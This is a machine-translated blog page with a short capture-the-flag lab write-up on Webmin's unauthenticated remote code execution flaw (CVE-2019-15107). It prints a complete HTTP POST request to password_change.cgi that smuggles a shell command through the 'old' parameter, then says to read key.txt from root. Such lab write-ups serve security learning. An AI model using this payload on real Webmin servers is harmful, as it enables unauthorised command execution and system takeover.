当前位置:网站首页>Moher College webmin unauthenticated remote code execution
Moher College webmin unauthenticated remote code execution
2022-07-04 07:44:00 【Lyswbb】
First, get to the shooting range and visit , Visit a landing page later

According to the title , Unauthorized rce, So you can look for history first CVE Number (CVE-2019-15107), After finding it, directly reproduce the vulnerability , The vulnerability lies in the password reset function :Webmin--Webmin confuration--Authentication

burp Grab traffic packets , Then change the parameters , Pay attention to the need to session_login.cgi Change to password_change.cgi, The following parameters can be copied directly , The trigger of this vulnerability point only needs to pass one expired Execute the command with parameters
POST /password_change.cgi HTTP/1.1
Host: 124.70.64.48:47372
Cookie: redirect=1; testing=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: https://124.70.64.48:47372
Referer: https://124.70.64.48:47372/session_login.cgi
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
user=dfgfgf&pam=&expired=2&old=test|pwd&new1=test2&new2=test2
Directly query the root key.txt that will do

边栏推荐
- Common components of flask
- The text box displays the word (prompt text) by default, and the text disappears after clicking.
- Activiti常見操作數據錶關系
- rapidjson读写json文件
- Using the rate package for data mining
- Preliminary study on temporal database incluxdb 2.2
- 手写简易版flexible.js以及源码分析
- zabbix 5.0监控客户端
- 线性代数1.1
- 弈柯莱生物冲刺科创板:年营收3.3亿 弘晖基金与淡马锡是股东
猜你喜欢

Amd RX 7000 Series graphics card product line exposure: two generations of core and process mix and match
![[Gurobi] 简单模型的建立](/img/3f/d637406bca3888b939bead40b24337.png)
[Gurobi] 简单模型的建立

Introduction to sap commerce cloud B2B organization function

window上用.bat文件启动项目

BUUCTF(3)

Advanced MySQL: Basics (5-8 Lectures)

Preliminary study on temporal database incluxdb 2.2

Project 1 household accounting software (goal + demand description + code explanation + basic fund and revenue and expenditure details record + realization of keyboard access)

University stage summary

Wechat has new functions, and the test is started again
随机推荐
Implementation of ZABBIX agent active mode
ZABBIX 5.0 monitoring client
Rhcsa day 3
线性代数1.1
Handwritten easy version flexible JS and source code analysis
Mysql database - function constraint multi table query transaction
Oracle-存储过程与函数
Activiti常見操作數據錶關系
[Android reverse] function interception (use cache_flush system function to refresh CPU cache | refresh CPU cache disadvantages | recommended time for function interception)
Jianmu continuous integration platform v2.2.2 release
深入浅出:了解时序数据库 InfluxDB
ZABBIX monitoring system deployment
Practice (9-12 Lectures)
A real penetration test
Zephyr 学习笔记2,Scheduling
JVM中堆概念
BUUCTF(4)
L1-026 I love gplt (5 points)
zabbix 5.0监控客户端
谷歌官方回应:我们没有放弃TensorFlow,未来与JAX并肩发展